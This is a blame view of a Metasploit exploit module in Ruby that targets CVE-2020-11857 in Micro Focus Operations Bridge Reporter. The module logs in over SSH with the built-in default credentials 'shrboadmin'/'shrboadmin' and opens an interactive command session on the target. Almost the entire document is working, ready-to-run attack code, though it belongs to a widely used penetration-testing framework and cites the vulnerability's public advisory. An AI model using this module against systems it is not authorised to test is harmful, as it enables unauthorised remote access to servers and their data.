Files
metasploit-gs/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

136 lines
4.0 KiB
Ruby
Raw Normal View History

2021-04-23 15:00:06 +07:00
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Micro Focus Operations Bridge Reporter shrboadmin default password',
'Description' => %q{
This module abuses a known default password on Micro Focus Operations Bridge Reporter.
2021-04-23 15:03:34 +07:00
The 'shrboadmin' user, installed by default by the product has the password of 'shrboadmin',
2021-04-29 11:46:40 -04:00
and allows an attacker to login to the server via SSH.
2021-04-23 15:00:06 +07:00
This module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier
versions are most likely affected too.
2021-04-23 19:23:18 +07:00
Note that this is only exploitable in Linux installations.
2021-04-23 15:00:06 +07:00
},
'License' => MSF_LICENSE,
2021-08-27 17:15:33 +01:00
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'References' => [
[ 'CVE', '2020-11857' ],
[ 'ZDI', '20-1215' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md' ],
[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03710590' ],
],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
2021-04-23 15:00:06 +07:00
'Platform' => 'unix',
'Arch' => ARCH_CMD,
2021-08-27 17:15:33 +01:00
'Targets' => [
[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],
],
2021-04-23 15:00:06 +07:00
'Privileged' => false,
'DefaultTarget' => 0,
2022-04-18 20:09:52 +02:00
'DisclosureDate' => '2020-09-21',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
2021-04-23 15:00:06 +07:00
)
)
register_options(
[
Opt::RPORT(22),
OptString.new('USERNAME', [true, 'Username to login with', 'shrboadmin']),
OptString.new('PASSWORD', [true, 'Password to login with', 'shrboadmin']),
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user, pass)
2022-04-18 20:08:27 +02:00
opts = ssh_client_defaults.merge({
2021-04-23 15:00:06 +07:00
auth_methods: ['password', 'keyboard-interactive'],
port: rport,
2022-04-18 20:08:27 +02:00
password: pass
})
2021-04-23 15:00:06 +07:00
opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, user, opts)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end
return nil
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("#{rhost}:#{rport} - Attempt to login to the server...")
conn = do_login(user, pass)
if conn
print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
handler(conn.lsock)
end
end
end